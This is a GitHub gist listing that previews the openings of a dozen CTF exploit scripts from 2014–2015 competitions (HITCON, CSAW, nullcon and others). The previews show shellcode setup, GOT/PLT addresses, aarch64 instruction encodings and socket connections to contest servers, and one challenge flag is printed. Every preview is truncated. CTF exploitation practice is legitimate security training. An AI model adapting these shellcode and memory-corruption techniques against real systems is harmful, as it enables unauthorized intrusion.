Skip to content

Instantly share code, notes, and snippets.

@g05u
g05u / xpl_callme.py
Last active Aug 29, 2015
Callme hitcon-ctf exploit
View xpl_callme.py
#!/usr/bin/env python
from nulllife import *
import struct
shellcode = NullShell(name = 'exec', arch = 'x86', os = 'linux').get()
stack_chk_got = 0x0804A018
message_data = 0x0804A070
@g05u
g05u / xpl_ty_hitcon.py
Created Aug 18, 2014
Exploit ty (aarch64 - arm64) Hitcon-ctf
View xpl_ty_hitcon.py
#!/usr/bin/env python
from struct import *
from nulllife import *
s = NullSocket("210.71.253.109", 9123)
#shell address is 0x411468
shellcode = struct.pack("<I", 0x90000000) #adrp x0, 0x411000
shellcode += struct.pack("<I", 0x91120000) #add x0, x0, #0x480
@g05u
g05u / xpl_rsbo.py
Created Aug 18, 2014
Hitcon-ctf rsbo exploit
View xpl_rsbo.py
#!/usr/bin/env python
from struct import *
from nulllife import *
new_ebp = 0x0804a100
plt_read = 0x080483E0
plt_open = 0x08048420
plt_write = 0x08048450
flag_str = 0x080487D0
View ncn_explicit_exploit.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#
#NoConName CTF
#explitcit exploit 500pts
#
s = NullSocket("88.87.208.163", 7070)
@g05u
g05u / csaw_2014_greenhorn_exploit.py
Created Sep 21, 2014
Exploit greenhornd CSAW 2014 CTF
View csaw_2014_greenhorn_exploit.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#greenhorn exploit
offset_data = 0x3F8
s = NullSocket("54.164.253.42", 9998)
s.readuntil("Password: ")
@g05u
g05u / csaw_2014_xorcise.py
Created Sep 21, 2014
CSAW CTF 2014 - xorcise exploit
View csaw_2014_xorcise.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#xorcise exploit
def xor(data, key):
o = ''
for i in range(len(data)):
@g05u
g05u / csaw_2014_s3.py
Created Sep 21, 2014
CSAW CTF 2014 - s3 exploit
View csaw_2014_s3.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#s3 exploit
s = NullSocket("54.165.225.121", 5333)
s.readuntil("> ")
@g05u
g05u / hackim_2015_mixme.py
Last active Aug 29, 2015
Hackim/nullcon CTF 2015 - mixme exploiting 400 points
View hackim_2015_mixme.py
#!/usr/bin/env python
from nulllife import *
import sys, time
# www.null-life.com
# write-up / exploit by @_g05u_
# Hackim/nullcon CTF 2015 - mixme exploiting 400 points
# Flag: aw3s0m3++_hipp1e_pwn_r0ckst4r
c = 0x61
@g05u
g05u / alewife_exploit.py
Last active Aug 29, 2015
Boston ctf party alewife writeup/exploit
View alewife_exploit.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
import ast
# @_g05u_
#boston ctf party 2015
# exploit alewife chall
# www.null-life.com
@g05u
g05u / quine_xpl.py
Created Apr 26, 2015
DragonSector CTF Quine Exploit
View quine_xpl.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
# DragonSector CTF
# exploit quine
# www.null-life.com / @_g05u_
def n2h(val, nbits = 32):
return ((val + (1 << nbits)) % (1 << nbits))
You can’t perform that action at this time.